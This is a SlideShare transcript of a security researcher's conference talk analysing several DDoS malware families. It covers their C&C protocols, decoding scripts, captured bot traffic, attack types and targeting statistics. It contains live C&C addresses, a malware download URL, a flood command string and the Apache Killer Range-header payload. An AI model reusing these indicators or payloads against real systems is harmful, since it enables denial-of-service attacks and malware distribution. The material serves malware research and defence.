SlideShare a Scribd company logo
1 of 146
ASERT‟s DDoS Malware Corral
Volume 2
1
ASERT‟s DDoS Malware Corral
Volume 2
2
3
Agenda
• Who am I
• What is Mcorral
• Quick DDoS Overview
• Malwares
– Life and Death of a DDoS Malware
– "The APT"
– Give 'Em the Boot
– A Business of Ferrets
– The "Hack Forums" Bot
– A Lion, a Snake, and a Goat
– The Accidental APT
• Trends and Takeaways
4
Who am I
• Dennis Schwarz
– Security Research Analyst on Arbor Networks’
ASERT
– Formerly an intrusion analyst with Dell
Secureworks
5
Mcorral == Malware Corral
• ASERT’s malware collection, storage, and
processing system
• Second generation
• Developed in-house with dedicated dev-team
– Hi jedwards
• Configured by analysts for analysts
Mcorral – Metaphorically
6
Mcorral – Visually
7
Mcorral – Logically
8
Mcorral – DDoS Malware
9
10
DDoS Attacks – Basic
• ICMP flood
• UDP flood
• TCP SYN flood
• TCP Connect flood
• TCP flood
• HTTP HEAD/GET/POST flood
11
DDoS Attacks – Layer 7
• Slowloris
• ARME (Apache Remote Memory Exhaustion)
a.k.a Apache Killer
– Range:bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,…a lot
more…5-1298,5-1299
• RUDY (R-U-Dead-Yet)
• DNS
12
DDoS Attacks – Reflection/Amplification
• Chargen
• DNS
• NTP
• SNMP
DDoS Attacks – Booters
13
14
Why these malwares?
• DDoS related
• Automated heuristics
• Less well known
• Smaller
• Active campaigns
• Pet malware
Life and Death of a DDoS Malware
Trojan.BlackRev
15
Born
• March 2013
Russian
17
Delphi
Namesake
19
Panel
20
Marketing
21
Pricing
• Admin panel and bot
build: 300-450 WMZ
• Bot builder: 650-1000
WMZ
Author
23
Author – Attribution
24
C&C – Phone Home
25
C&C – Command Polling
26
Attack Types
• http – HTTP GET request flood
• simple – HTTP GET request flood
• loginpost – HTTP POST request flood
• datapost – HTTP POST request flood
• syn – TCP connection flood
• udp – UDP flood
• udpdata – UDP flood
• data – TCP flood
• icmp – ICMP echo request flood
• tcpdata – TCP flood
• dataget – HTTP GET request flood
• connect – TCP flood
• antiddos – HTTP GET request flood – favicon.ico
• range – HTTP GET request flood – Range header
• ftp – FTP connection flood
• download – HTTP GET request flood
• fastddos – HTTP GET request flood – WinInet functions
• slowhttp – HTTP GET request flood – possible Slowloris attempt
• allhttp – multi HTTP floods
• full – multi floods
C&C – Locations
28
Attack Type Distribution
29
http
64.06%
udp
23.44%
syn
11.06%
loginpost
1.17%
datapost
0.11%
data
0.08%
postlogin
0.07%
Targeted Countries
30
UA
11.77%
SE
2.60%
GB
17.83%
RU
39.81%
SG
0.04%
US
1.48%
PA
0.43%
MY
1.70%
CR
9.87%
BZ
4.16%
DE
10.32%
Targets
31
Died
• June 5, 2013
32
Estate Sale
• October 4, 2013
33
Code Snippet
34
“The APT”
Trojan.UUTab
35
36
First Seen
• May 1, 2013
Chinese
37
C++
38
Namesake
39
C&C – Obfuscation
40
def decrypt(msg):
# xor key is stored in a 126 element array of words.
# each element is assigned manually.
key =
[3,2,5,8,5,1,2,3,2,5,3,4,1,2,4,3,5,8,2,4,5,8,1,2,4,3,1,1,8,1,2,4,3,1,1,5,2,2,1,2,1,3,5,2,2,1,2,1
,3,3,1,2,3,5,2,6,2,4,1,3,2,1,2,6,2,3,3,2,1,1,3,6,2,1,2,4,4,3,1,2,3,5,2,6,3,1,2,3,5,2,6,5,2,2,1,2
,1,2,6,2,3,3,2,1,1,5,2,2,1,2,1,2,3,2,5,3,4,1,2,2,3,1,2,3,5,2]
assert len(key) == 126
plain = []
for i in range(len(msg)):
plain_byte = ord(msg[i]) ^ key[i % len(key)]
plain.append(chr(plain_byte))
return "".join(plain)
C&C – Obfuscation
41
C&C – Phone Home
• binstruct
• 516 or 1028 bytes
struct {
char magic[4] = "UUt";
char os_version[64];
int cpu_speed;
char padding1[32];
int max_network_interface_speed;
char padding2[408];
}
42
C&C – Phone Home
43
C&C – Response (516-byte)
struct {
int command;
struct params params;
char padding[76];
}
struct params {
char target_host[400];
short target_port;
short padding;
int flood_time_in_secs;
int delay_in_ms;
int number_of_threads;
int sub_command;
int field_1A4;
int rand_source_ip_bool;
int payload_size;
int field_1B0;
}
44
C&C – Response (1028-byte)
struct {
int command = 0x77;
struct params params;
char padding[324];
}
struct params {
char query_name[100];
int flood_time_in_secs;
int delay_in_ms;
int number_of_threads;
int source_ip[32];
int set_query_name;
int set_rand_ip;
int set_source_ip;
int num_dns_servers;
char dns_server_0[30];
...
char dns_server_17[30];
}
45
Attack Types
• 0x88, 0x1 – TCP SYN flood
• 0x88, 0x2 – “big” TCP SYN flood
• 0x88, 0x3 – “big” TCP SYN flood (duplicate)
• 0x88, 0x4 – UDP flood
• 0x88, 0x5 – ICMP echo request flood
• 0x77 – DNS server flood or DNS amplification
attack
46
C&C -- Locations
47
Last Seen
• February 11, 2014
48
Give „Em the Boot
Trojan.AyaBot
49
50
Namesake
• Aya == AreYouAreDo
51
First Seen
• May 23, 2013
Russian
52
Delphi
Marketing / Pricing
54
C&C – Redirect
55
C&C – Obfuscation
56
>>> from base64 import b64decode
>>>
b64decode(b64decode(b64decode("WVVoU01HTkViM1pNTWtvMVlrYzVjVmxZ
U25KaU1qVm9Xa2hhZG1OdFZYVmpibFYyV1RKNGFHTXpUbXhqZVRsNlRHN
UNiMk5CUFQwPQ==")))
'http://bylojarkonadvore.ru/classes/s.php’
C&C – Ping
57
C&C – Obfuscation
Query
>>>
b64decode(b64decode(b64decode("WTBk
c2RWcDNQVDA9")))
'ping'
Response
>>>
b64decode(b64decode(b64decode("VFRK
Tk5VMXRVVFZaVjFacFRVUmpNRnB0V1
hwT2FtUnJUbTFOTUZwdFZURk9ha1pxV
1cxYWFGcFVWVDA9")))
'3c92d9aeb074ff367d6c4fe561cbfae5'
58
C&C – Registration
59
C&C – Obfuscation
Query
>>>
b64decode(b64decode(b64decode("WTIxV2JtRll
UakJhV0VvNFVWaHNhRkZ0T1RCbVJVWkZW
RlZzVDB4VlVrWlBWVTVEVDBSb1ExRnVlRXB
pYmxKc1lrTlZlVTlHU1d4TmFtdHlWMGRXZG1K
cFZYbFBSa2xzVFdwcmNsRXhRbFpMZVhOeV
MzbHpja3Q1YzNKTGVYUkdUbFJaTUU1VGMz
SktWRkYzUzNwSmRVNUVRa2hUU0c5eVRGT
nplVTE2WnpWTE1ERkpaV2x6Y2t0Nll6Sk9NRE
ZEUzNsemNrMUhVWEpOUjJkeVRWY3djazFV
VW5wTGVYTnlWakpzZFZkR1FYSkxlWFJXVlR
CRlBRPT0=")))
'register|AyaBot|ADMIN-
DE9CB88BB|Intel%28R%29+Xeon%28R%29+C
PU+++++++++++E5645++%40+2.40GHz+-
+2389+MHz+++767MB+++0d+0h+1m+14s+++
WinXP+++USA’
Response
>>>
b64decode(b64decode(b64decode("V1RJNWR
WcHRiRzVtUjJ4clprUlJlRTFFWnpRPQ==")))
'config|id|41088'
60
C&C – Command Polling
61
C&C – Obfuscation
Query
>>>
b64decode(b64decode(b64decode("V2pK
V01HUkhSbnBoTTNjd1RWUkJORTlJZUV
KbFYwWkRZak5TT0UxcE5IaE9XSGhwV1
cxUmVFNXFWWGRPZWtwcVdtYzlQUT0
9")))
'gettask|41088|AyaBot|2.15|bbd165072cf'
Response
>>>
b64decode(b64decode(b64decode("WkR
KR2NHUkJQVDA9")))
'wait'
62
Attack Types
• udp – UDP flood
• tcp – TCP flood
• syn – TCP connect flood
• icmp – ICMP request flood
• ie – HTTP GET/POST request flood via
browser
• http – HTTP GET/POST request flood
63
C&C – Locations
64
Attack Type Distribution
65
http
74%
syn
26%
Targeted Countries
66
RU
41%
RO
18%
US
15%
UA
11%
GB
7%
DE
2%
Unknown
2%
FR
2%
BE
2%
Targets
67
68
Impromptu Interview
• http://areyouaredo.cc/c/identification.php
69
Interview – Snippets
• On distribution of malware/exploit kits
– 20:17:21 AreYouAreDo: exploits are very expensive
• On advertising of booter service
– 20:19:45 AreYouAreDo: google
• On how he got started in DDoS
– 20:28:47 AreYouAreDo: well, image poor guy or people in so poor, corrupted country
like russia or ukraine. annoying bad job, money is tight. and a lot of ambition)
• On how much money he makes
– 20:31:52 AreYouAreDo: how much money? hmm much much better than regular job
• On hacking sites
– 20:41:55 AreYouAreDo: xss. sql.
70
Interview – Snippets
• On his customers and their attacks
– 20:34:41 AreYouAreDo: sometimes there is some job from police =)
– 20:37:44 AreYouAreDo: web-shops, political, games etc.
• On handling money
– 20:40:01 AreYouAreDo: well , ill say not clear true, but enough to
understand. online game currencyies
– 20:40:53 AreYouAreDo: bitcoin is not popular for russian customers
• On anti-DDoS companies
– 20:53:01 AreYouAreDo: that might be interesting from [for] you that mant
[many] anti-ddos companies was or still selling ddos services =)
71
Interview – Snippets
• On his customers and their attacks
– 20:34:41 AreYouAreDo: sometimes there is some job from police =)
– 20:37:44 AreYouAreDo: web-shops, political, games etc.
• On handling money
– 20:40:01 AreYouAreDo: well , ill say not clear true, but enough to
understand. online game currencyies
– 20:40:53 AreYouAreDo: bitcoin is not popular for russian customers
• On anti-DDoS companies
– 20:53:01 AreYouAreDo: that might be interesting from [for] you that mant
[many] anti-ddos companies was or still selling ddos services =)
Last Seen
• February 20, 2014
72
A Business of Ferrets
Trojan.Ferret
73
74
First Seen
• November 30, 2013
Russian
75
Delphi
76
Panel – Logon
77
Angry Cat Aside
78
Panel – Statistics
79
Panel – Bot List
80
Versions
• 2.11
• 2.12
• 2.22
• 2.24
81
Distribution
• Andromeda
– February 2014
– http://www.discoverylaos.com/images/5ise.exe
• Trojan.Ferret
• 2ca7dd095a266867fd72d3d6db5bbce5
82
83
C&C – Obfuscation
• 8
def decrypt_cnc(msg, key):
msg_no_b64 = base64.b64decode(msg)
plain_buf = []
for offset, enc_byte in enumerate(msg_no_b64):
plain_byte = ord(enc_byte) ^ ord(key[offset % len(key)])
plain_buf.append(chr(plain_byte))
return "".join(plain_buf)
Strings – Obfuscation
• 12xc3qwfhjeryTTYHH
• mu#X
84
def decrypt_strings(msg, key):
msg_no_b64 = base64.b64decode(msg)
plain_buf = []
for i in range(len(msg_no_b64)):
key_lsb = ord(key[i % len(key)]) & 0xf
msg_lsb = ord(msg_no_b64[i]) & 0xf
c = msg_lsb ^ key_lsb
d = c ^ 0xa
msg_slsb = ord(msg_no_b64[i]) & 0xf0
plain_byte = msg_slsb ^ d
plain_buf.append(chr(plain_byte))
return "".join(plain_buf)
C&C – Encryption Keys
• GMrlZ8t3pypO3423423LpFqCUx
• r7EmA83vkqMzPdjFD6poMMJunbpcKHsi
• tEhcC382fJxOQxT4v0bJWnttu4UdFO7S
• SnEvAjtZP2YUHbHdhYETII2FNS0RM4hK
• 6mEx2OU8mrLtS51yGSnExzKW7RQI1TL6
• HPWwCNtLoDt7rkOz1nxH7tIV7NRVnYpj
• FQNZ9Ioax3PyVefugdbm2cU5wWuqMvxH
• 0BWoYwkosH5jn1eD2kQjWu4LjPlSrtDQ
85
C&C – Phone Home
86
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==
&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=
m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h
7m 28s
C&C – Fake Phone Home
87
POST /SpC/wowcab.php HTTP/1.0
Host: anyve.org
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_1; pl-PL)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2
Safari/537.36
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://moneydo.nl
Content-Length: 110
Content-Type: application/x-www-form-urlencoded
m=CA==&h=CQAJAA4IDAgACwkPDQ8ACggOCQsJCwwJCw0JDQgI
&p=cndwdhVoexhjdnlsZRgIXAhQCQpV&v=ChYKDBhta3k=&s=D0AAD
hhtGA==
C&C – Phone Home Response
88
HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 14:48:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8
dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN
Mozilla Gecko Firefox 25
C&C – User Agents
• Mozilla Gecko Firefox 25
• Mozilla compatible (Apple webKit 6)
• Mozilla Gecko 5.0 Firefox
• Mozilla Gecko 1.664
• Mozilla Gecko 123
• Mozilla Gecko 4.0 compatible
• Mozilla Gecko 112
• Mozilla Gecko
89
C&C – Command Polling
90
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://udot.tk
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=
m=1&h=18803769021711750776216376939
C&C – Command Polling Response
91
HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 12:56:16 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 72
Connection: close
Content-Type: text/html; charset=UTF-8
UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEg
g=
httpflood*http://target.net/index.php/*80*150*0
Attack Types
• httpflood – HTTP GET flood
• httppost – HTTP POST flood
• udpflood – UDP flood
• synflood – TCP connect flood
• tcpflood – TCP flood
92
C&C – Locations
93
Attack Types Distribution
94
tcpflood
1%
httpflood
95%
udpflood
4%
Targeted Countries
95
DE
36%
Unknown
31%
RU
22%
FR
3%
US
3%
NL
3%
UA
1%
GB
0%
KZ
1%
EE
0%
Targets
96
Last Seen
• February 14, 2014
97
The “Hack Forums” Bot
Trojan.UGSec
98
99
First Seen
• July 2, 2013
US
100
C++
101
Marketing
102
Marketing
103
Pricing
• 30-50$
• Paypal and Bitcoin
104
Author
105
106
Author – Poor OPSEC
1. Posted Steam username on Hack Forums
thread
2. Steam Profile linked to gaming site
3. Gaming site linked to Etsy shop
4. Etsy links to real
name, location, age, pictures, twitter, etc.
107
C&C
• IRC
• Nickname: UGSec[US|W7|x86|1c]rmryazr24v
– Country code (provided by
http://freegeoip.net/xml/)
– Windows version
– Architecture
– Number of processors
– 10 random lowercase alphanumeric characters
108
Attack Types
• !ddos.layer4.chargen.udp - UDP flood
• !ddos.layer4.chargen.tcp - TCP flood
• !ddos.layer7.samp - Grand Theft Auto San
Andreas Multiplayer query flood
109
Attack Types -- !ddos.layer7.samp
• Grand Theft Auto San Andreas Multiplayer
query flood
• http://wiki.sa-mp.com/wiki/Query_Mechanism
110
Last Seen
• August 8, 2013
A Lion, a Snake, and a Goat
Trojan.Chimera
111
112
First Seen
• July 12, 2013
Bulgarian
113
Panel – Login
114
C++
115
116
Namesake
• d:developementprojectschimeraReleasechi
mera.pdb
Source Code
117
C&C – Redirect
118
C&C – Command Polling
119
C&C – Response
120
121
Attack Types
• GET – HTTP GET flood
• POST – HTTP POST flood
• SLOW – Slowloris
• TCP – TCP flood
C&C – Locations
122
Attack Type Distribution
123
SLOW
100%
Targeted Countries
124
US
100%
Targets
125
126
Last Seen
• February 18, 2014
The Accidental APT (an aside)
Trojan.Zuguo
127
strings
$ strings AML-11464843.rsrc-47189006.dynamic.dropped | grep -i ddos
SIMPLE_DDOS
128
Reverse Engineering Results
• No DDoS capabilities
• Chinese RAT
– Dubbing Trojan.Zuguo
•C&C communications crypto key
129
Namesake and Stage 1 C&C
130
C&C – Stage 2
• C&C communications encrypted with Blowfish
and LZO compression
• Phone home fields
– Most fields are self explanatory
131
ADMIN-PC/SYSTEM|Windows 7x32 Service Pack 1.0 (Build 7601)
|1 * 59733MHz|Total:767MB,Avail:448MB|0d 0h 1m 32s| 10.74.21.100|a.b.c.d|341
ms|0||new|123|1.0|0|0|0|0|
Registry – Configuration
132
Attribution – Trojan.DrAgOn
• Shares the solo C&C IP with Trojan.DrAgOn
133
Trojan.DrAgOn C&C – Obfuscation
134
import sys
import struct
import zlib
fp = open(sys.argv[1], "rb")
data = fp.read()
fp.close()
offset = 0
if len(sys.argv) == 3:
offset = int(sys.argv[2])
data = data[offset:]
print "tag: %s" % data[0:6]
packed_size = struct.unpack("I", data[6:10])[0]
print "packed_size: %d" % packed_size
unpacked_size = struct.unpack("I", data[10:14])[0]
print "unpacked_size: %d" % unpacked_size
print "data: %s" % zlib.decompress(data[14:packed_size])
Trojan.DrAgOn C&C – Obfuscation
135
$ python DrAgOn_decrypt.py pcap1_outbound_data
tag: DrAgOn
packed_size: 37
unpacked_size: 21
data: ?20080808181818ABCDEF
$ python DrAgOn_decrypt.py pcap1_outbound_data 37
tag: DrAgOn
packed_size: 319
unpacked_size: 2281
data: ?yr?ky??v000802A2E23DFI?antimodernistme(
Service Pack 2Intel(R) Pentium(R) III CPU - S 1133MHz
?eCompaq NC3163 Fast Ethernet NIC - Packet Scheduler
Minipor??=?+???Compaq NC3163 Fast Ethernet NIC #2 - Packet
Scheduler Minipor??&?+?
Attribution – FireEye‟s Sunshop Campaign
136
Certificate
137
Trends and Takeaways
138
139
Languages
• C/C++
• Delphi
• C#/.NET
• Visual Basic
• Perl
• PHP
– itsoknoproblembro
• Python
• Java
Visual Basic Aside
140
C&C Types
• HTTP
• Binstruct
• IRC
• ASCII
141
Crypto
• XOR
• Base64
• Rot13
• RC4
• Compression
– Zlib
– LZO
142
Attack Types in the Wild
143
http_post
12%
slowloris
19%
tcp_connect
0%
http_get
57%
arme
0%
udp
2%
rudy
0%
tcp_syn
0% icmp
0%
other
7%
tcp
3%
http_post
slowloris
tcp_connect
http_get
arme
udp
rudy
tcp_syn
icmp
other
tcp
• Copy and paste culture
• Lots of broken implementations
• Too many flood types
• DNS amplifications attacks are starting to be
integrated into bots
144
Miscellaneous
• Copy and paste culture
• Lots of broken implementations
• Too many flood types
• DNS amplifications attacks are starting to be
integrated into bots
145
Miscellaneous
Questions/Comments/Feedback
• dschwarz@arbor.net
• @tildedennis
146

More Related Content

What's hot

The Background Noise of the Internet
The Background Noise of the InternetThe Background Noise of the Internet
The Background Noise of the InternetAndrew Morris
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
Securing Your APIs against the Recent Vulnerabilities in SSLv2/SSLv3
Securing Your APIs against the Recent Vulnerabilities in SSLv2/SSLv3 Securing Your APIs against the Recent Vulnerabilities in SSLv2/SSLv3
Securing Your APIs against the Recent Vulnerabilities in SSLv2/SSLv3 Akana
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...grecsl
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...APNIC
 
Bitcoin Keys, Addresses & Wallets
Bitcoin Keys, Addresses & WalletsBitcoin Keys, Addresses & Wallets
Bitcoin Keys, Addresses & WalletsChristopher Allen
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014grecsl
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 
SANS Forensics 2009 - Memory Forensics and Registry Analysis
SANS Forensics 2009 - Memory Forensics and Registry AnalysisSANS Forensics 2009 - Memory Forensics and Registry Analysis
SANS Forensics 2009 - Memory Forensics and Registry Analysismooyix
 
My Bro The ELK
My Bro The ELKMy Bro The ELK
My Bro The ELKTripwire
 
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...Felipe Prado
 
HITCON 2015: Your Lightbulb Is Not Hacking You: Observation from a Honeypot B...
HITCON 2015: Your Lightbulb Is Not Hacking You: Observation from a Honeypot B...HITCON 2015: Your Lightbulb Is Not Hacking You: Observation from a Honeypot B...
HITCON 2015: Your Lightbulb Is Not Hacking You: Observation from a Honeypot B...Philippe Lin
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk   potentially malicious ur ls(130216) #fitalk   potentially malicious ur ls
(130216) #fitalk potentially malicious ur lsINSIGHT FORENSIC
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 
Layer 8 and Why People are the Most Important Security Tool
Layer 8 and Why People are the Most Important Security ToolLayer 8 and Why People are the Most Important Security Tool
Layer 8 and Why People are the Most Important Security ToolDamon Small
 
2018 colombia deconstruyendo y evolucionando la seguridad en servicios rest
2018 colombia deconstruyendo y evolucionando la seguridad en servicios rest2018 colombia deconstruyendo y evolucionando la seguridad en servicios rest
2018 colombia deconstruyendo y evolucionando la seguridad en servicios restCésar Hernández
 
Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)ITCamp
 
Build your own private blockchain based on ethereum
Build your own private blockchain based on ethereumBuild your own private blockchain based on ethereum
Build your own private blockchain based on ethereumMehran Pourvahab
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 

What's hot (20)

The Background Noise of the Internet
The Background Noise of the InternetThe Background Noise of the Internet
The Background Noise of the Internet
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Securing Your APIs against the Recent Vulnerabilities in SSLv2/SSLv3
Securing Your APIs against the Recent Vulnerabilities in SSLv2/SSLv3 Securing Your APIs against the Recent Vulnerabilities in SSLv2/SSLv3
Securing Your APIs against the Recent Vulnerabilities in SSLv2/SSLv3
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
 
Bitcoin Keys, Addresses & Wallets
Bitcoin Keys, Addresses & WalletsBitcoin Keys, Addresses & Wallets
Bitcoin Keys, Addresses & Wallets
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
 
SANS Forensics 2009 - Memory Forensics and Registry Analysis
SANS Forensics 2009 - Memory Forensics and Registry AnalysisSANS Forensics 2009 - Memory Forensics and Registry Analysis
SANS Forensics 2009 - Memory Forensics and Registry Analysis
 
My Bro The ELK
My Bro The ELKMy Bro The ELK
My Bro The ELK
 
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
DEF CON 27 - WENXIANG QIAN and YUXIANG LI HUIYU - breaking google home exploi...
 
HITCON 2015: Your Lightbulb Is Not Hacking You: Observation from a Honeypot B...
HITCON 2015: Your Lightbulb Is Not Hacking You: Observation from a Honeypot B...HITCON 2015: Your Lightbulb Is Not Hacking You: Observation from a Honeypot B...
HITCON 2015: Your Lightbulb Is Not Hacking You: Observation from a Honeypot B...
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk   potentially malicious ur ls(130216) #fitalk   potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
 
BlueHat v17 || Disrupting the Mirai Botnet
BlueHat v17 || Disrupting the Mirai Botnet BlueHat v17 || Disrupting the Mirai Botnet
BlueHat v17 || Disrupting the Mirai Botnet
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
Layer 8 and Why People are the Most Important Security Tool
Layer 8 and Why People are the Most Important Security ToolLayer 8 and Why People are the Most Important Security Tool
Layer 8 and Why People are the Most Important Security Tool
 
2018 colombia deconstruyendo y evolucionando la seguridad en servicios rest
2018 colombia deconstruyendo y evolucionando la seguridad en servicios rest2018 colombia deconstruyendo y evolucionando la seguridad en servicios rest
2018 colombia deconstruyendo y evolucionando la seguridad en servicios rest
 
Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)
 
Build your own private blockchain based on ethereum
Build your own private blockchain based on ethereumBuild your own private blockchain based on ethereum
Build your own private blockchain based on ethereum
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 

Viewers also liked

HKNOG 1.0 - DDoS attacks in an IPv6 World
HKNOG 1.0 -  DDoS attacks in an IPv6 WorldHKNOG 1.0 -  DDoS attacks in an IPv6 World
HKNOG 1.0 - DDoS attacks in an IPv6 WorldTom Paseka
 
An Inside Look at a Sophisticated, Multi-vector DDoS Attack
An Inside Look at a Sophisticated, Multi-vector DDoS AttackAn Inside Look at a Sophisticated, Multi-vector DDoS Attack
An Inside Look at a Sophisticated, Multi-vector DDoS AttackImperva
 
DDoS Open Threat Signaling (DOTS) Working Group Presentation on draft-ietf-do...
DDoS Open Threat Signaling (DOTS) Working Group Presentation on draft-ietf-do...DDoS Open Threat Signaling (DOTS) Working Group Presentation on draft-ietf-do...
DDoS Open Threat Signaling (DOTS) Working Group Presentation on draft-ietf-do...ShortestPathFirst
 
Preparing for the Imminent Terabit DDoS Attack
Preparing for the Imminent Terabit DDoS AttackPreparing for the Imminent Terabit DDoS Attack
Preparing for the Imminent Terabit DDoS AttackImperva
 
How to launch and defend against a DDoS
How to launch and defend against a DDoSHow to launch and defend against a DDoS
How to launch and defend against a DDoSjgrahamc
 
DDoS detection at small ISP by Wardner Maia
DDoS detection at small ISP by Wardner MaiaDDoS detection at small ISP by Wardner Maia
DDoS detection at small ISP by Wardner MaiaPavel Odintsov
 
Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)btpsec
 
Practical steps to mitigate DDoS attacks
Practical steps to mitigate DDoS attacksPractical steps to mitigate DDoS attacks
Practical steps to mitigate DDoS attacksSecurity Session
 
Bonnes pratiques anti-DDOS
Bonnes pratiques anti-DDOSBonnes pratiques anti-DDOS
Bonnes pratiques anti-DDOSJulien SIMON
 
Dağıtık Servis Dışı Bırakma Saldırıları
Dağıtık Servis Dışı Bırakma SaldırılarıDağıtık Servis Dışı Bırakma Saldırıları
Dağıtık Servis Dışı Bırakma SaldırılarıFerhat Ozgur Catak
 
(SEC306) Defending Against DDoS Attacks
(SEC306) Defending Against DDoS Attacks(SEC306) Defending Against DDoS Attacks
(SEC306) Defending Against DDoS AttacksAmazon Web Services
 
DoS DDoS Saldırıları ve Korunma Yöntemleri Kitabı
DoS DDoS Saldırıları ve Korunma Yöntemleri KitabıDoS DDoS Saldırıları ve Korunma Yöntemleri Kitabı
DoS DDoS Saldırıları ve Korunma Yöntemleri KitabıBGA Cyber Security
 
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
